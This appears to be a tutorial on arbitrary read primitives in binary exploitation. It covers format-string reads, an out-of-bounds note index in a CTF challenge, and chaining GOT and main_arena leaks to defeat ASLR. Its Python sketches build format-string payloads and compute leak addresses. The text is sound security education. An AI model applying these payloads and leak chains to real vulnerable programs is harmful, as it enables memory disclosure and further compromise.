Arbitrary read primitives
An arbitrary read primitive is a condition in which an attacker can read any readable location within a process's virtual memory. The closest formal definition in the Common Weakness Enumeration (CWE) list is Untrusted Pointer Dereference, which describes a program that dereferences whatever pointer value it is given, whether that value comes from a trusted or an untrusted source. The condition becomes useful to an attacker when the program also prints the contents of the location the pointer refers to. Below are some examples of how an attacker can implement or use an arbitrary read primitive present within a program.
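As a minimal sketch of the condition itself (not taken from any real target), the Python snippet below uses ctypes.string_at to dereference a raw address inside its own process. The read_memory helper and the secret buffer are hypothetical names introduced only for this illustration; in a real program the address would arrive from attacker-controlled input.

```python
import ctypes


def read_memory(address: int, length: int) -> bytes:
    """Dereference a caller-supplied address with no validation at all."""
    # ctypes.string_at copies `length` bytes starting at the raw address.
    # An unmapped address would crash the interpreter, much like a bad
    # pointer crashes a native program.
    return ctypes.string_at(address, length)


# Stand-in for sensitive data living somewhere in the process (hypothetical).
secret = ctypes.create_string_buffer(b"hunter2")

# In an attack the address would come from untrusted input; here we take it
# from the buffer itself so the demo is safe to run.
leaked = read_memory(ctypes.addressof(secret), 7)
print(leaked)
```

The helper never checks where the address came from or what it points to, which is exactly what makes it a read primitive once an attacker controls the argument.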
Use of Externally-Controlled Format String
Just as in our Arbitrary write primitives discussion, we note that a format string vulnerability is not a condition that the attacker implements; it is present because of programmer error. The condition is still useful to an attacker, however, because under the right conditions it lets them read memory from any location in the process.
Like our previous discussion, the attacker can provide an address in their forged format string in order to place that address onto the stack for their vulnerable printf() call. Also like our previous discussion, the attacker must know the offset of their placed address on the stack during the call to printf(). Unlike our previous discussion, the attacker will have to use different format string identifiers in order to print the contents of the address they placed onto the stack. The format string identifiers attackers most commonly use to dump information from memory are:
%p - void*
%x - unsigned int (printed in hexadecimal)
%s - null-terminated string
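The payload described above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: a 32-bit little-endian target, a printf() that supports positional arguments of the form %N$s (as glibc does), and a hypothetical target address and stack offset. The build_read_payload helper is a name invented for this example.

```python
import struct


def build_read_payload(target: int, offset: int) -> bytes:
    """Build a 32-bit format string that prints the string stored at `target`."""
    packed = struct.pack("<I", target)  # little-endian 4-byte address
    if b"\x00" in packed:
        # A NUL byte would end the format string before the specifier.
        raise ValueError("address contains a NUL byte")
    # %<offset>$s asks printf to treat the offset-th argument slot as a
    # char* and print from it; that slot is where the packed address lands.
    return packed + f"%{offset}$s".encode()


# Hypothetical values: the address to read and the stack offset of the payload.
payload = build_read_payload(0x0804A010, 7)
print(payload)
```

On 64-bit targets user-space addresses contain NUL bytes, so the address is usually placed after the specifier rather than before it, and the offset changes accordingly.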
Use of Out-of-range Pointer Offset
This particular condition is a child of Improper Restriction of Operations within the Bounds of a Memory Buffer, but I feel the child is the more applicable of the two to this discussion about arbitrary read primitives. The most important portion of this condition's Extended Description is the statement:
If an attacker can control or influence the offset so that it points outside of the intended boundaries of the structure, then the attacker may be able to read or write to memory locations that are used elsewhere in the program.
For our discussion, we're interested in the implementation of an arbitrary read primitive using the condition described above. A good example of implementing an arbitrary read primitive is the feap challenge from ASIS CTF Quals 2016. The arbitrary read primitive for this challenge exists in the print_note function of the vulnerable executable. The print_note function conducts no bounds checking when indexing into the notes array, allowing the attacker to provide array indices that are outside the bounds of the notes array. This ultimately leads to the program treating these out-of-bounds locations as note structures and attempting to call printf() on what it believes to be a note's title attribute.
Coincidentally, the note_sizes array resides directly below the notes array that the attacker is able to read past. The attacker is able to forge a valid pointer in memory in the note_sizes array by creating a note of a particular size: their target address - 0x40 (to account for the bytes added by the program). The attacker then reads past the notes array and fools the program into calling printf() on the valid memory address contained within note_sizes - the program thinks this pointer offset is a valid note struct.
This condition in this CTF challenge provides the attacker the ability to
implement an arbitrary read primitive.
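The arithmetic behind this trick is small enough to sketch in Python. The 0x40 adjustment comes from the description above; everything else is an assumption made for illustration: the 8-byte entry size, the helper names requested_size and oob_index, and the example addresses, none of which are taken from the actual feap binary.

```python
SIZE_PADDING = 0x40  # bytes the program adds to a requested note size
ENTRY_SIZE = 8       # assumption: both arrays hold 8-byte entries


def requested_size(target: int) -> int:
    """Size to request so the value stored in note_sizes equals `target`."""
    if target < SIZE_PADDING:
        raise ValueError("target address is too small to forge")
    return target - SIZE_PADDING


def oob_index(notes_addr: int, note_sizes_addr: int, slot: int) -> int:
    """Index into notes that actually lands on note_sizes[slot]."""
    delta = note_sizes_addr + slot * ENTRY_SIZE - notes_addr
    if delta % ENTRY_SIZE:
        raise ValueError("arrays are not aligned to the entry size")
    return delta // ENTRY_SIZE


# Hypothetical layout: note_sizes sits 0x400 bytes after notes.
size = requested_size(0x602040)
index = oob_index(0x1000, 0x1400, slot=2)
print(hex(size), index)
```

Creating a note with the computed size and then printing the note at the computed index is what turns the missing bounds check into a read of the chosen address.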
So what are arbitrary read primitives good for?
Attackers most commonly use arbitrary read primitives to leak sensitive program information, allowing them to bypass mitigations such as ASLR, PIE, stack canaries, and possibly even pointer mangling. If the attacker can conduct an arbitrary read of data from the stack, they will most likely be able to expose glibc and program pointers or return addresses stored on the stack, allowing them to calculate the base addresses for the glibc and program segments in the process's virtual memory mapping. Attackers would also have an interest in leaking heap pointer information in order to derive the base of the heap in memory, especially if their method of gaining code execution is via a heap memory corruption vulnerability.
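Deriving a base address from a leaked pointer is a single subtraction, sketched below in Python. The leaked value and the symbol offset are made-up numbers, and base_from_leak is a hypothetical helper; the page-alignment check is a common sanity test, assuming 4 KiB pages.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages


def base_from_leak(leaked: int, symbol_offset: int) -> int:
    """Subtract a symbol's known offset from its leaked runtime address."""
    base = leaked - symbol_offset
    if base < 0 or base % PAGE_SIZE:
        # Mapped segments start on page boundaries, so anything else means
        # the leak or the offset is wrong (for example, a mismatched libc).
        raise ValueError("derived base is not page-aligned")
    return base


# Hypothetical leak of a glibc pointer and that symbol's offset in the library.
libc_base = base_from_leak(0x7F3A1C2805A0, 0x805A0)
print(hex(libc_base))
```

The same subtraction applies to program and heap pointers, as long as the attacker knows the offset of the leaked object within its segment.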
Conclusion
An arbitrary read primitive is only useful if an attacker knows what information they want and where to get it. Attackers must also know how to use an initial exposure to guide succeeding exposures - you won't always know the exact address of your arbitrary read target, and you might need to expose the contents of other data structures in memory in order to find it.
Take for example a vulnerable non-PIE binary where an attacker can implement an arbitrary read primitive. The attacker doesn't know where the stack is, but they do know the location of the Global Offset Table (GOT), allowing them to leak the glibc addresses of functions that have already been called and resolved - from here an attacker can now derive the base of glibc in process memory. Now knowing the base of glibc in memory, if the attacker wished to locate the base of the heap, they would be able to target the main_arena in glibc. Using the main_arena, the attacker can leak the location of one of the bins, allowing them to derive the base of the heap in memory. The usefulness of an arbitrary read primitive relies on its user's understanding of the state of the process when the primitive is implemented and the user's knowledge of where important data structures are stored in process memory.
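The chain of leaks in this example can be sketched against a simulated process in Python. Every address and offset below is invented for illustration, the MEMORY dictionary stands in for the target's address space, and read_qword is a hypothetical stand-in for whatever read primitive the attacker actually has.

```python
# All addresses and offsets are hypothetical values chosen for the demo.
PUTS_GOT = 0x601018            # GOT slot of a resolved function (non-PIE)
PUTS_OFFSET = 0x809C0          # offset of that function inside glibc
MAIN_ARENA_OFFSET = 0x3EBC40   # offset of main_arena inside glibc
BIN_SLOT_OFFSET = 0x60         # offset of a bin pointer inside main_arena
CHUNK_OFFSET = 0x250           # offset of the leaked chunk from the heap start

LIBC_BASE = 0x7F0000000000
HEAP_BASE = 0x1C3F000

# Simulated process memory: address -> 8-byte value stored there.
MEMORY = {
    PUTS_GOT: LIBC_BASE + PUTS_OFFSET,
    LIBC_BASE + MAIN_ARENA_OFFSET + BIN_SLOT_OFFSET: HEAP_BASE + CHUNK_OFFSET,
}


def read_qword(address: int) -> int:
    """Stand-in for the attacker's arbitrary read primitive."""
    return MEMORY[address]


def find_bases(read):
    """Chain two reads: GOT -> glibc base -> main_arena -> heap base."""
    libc_base = read(PUTS_GOT) - PUTS_OFFSET        # first leak
    arena = libc_base + MAIN_ARENA_OFFSET           # now a known address
    heap_base = read(arena + BIN_SLOT_OFFSET) - CHUNK_OFFSET  # second leak
    return libc_base, heap_base


libc_base, heap_base = find_bases(read_qword)
print(hex(libc_base), hex(heap_base))
```

The second read is only possible because the first one revealed where glibc is mapped, which is the point of using an initial exposure to guide the ones that follow.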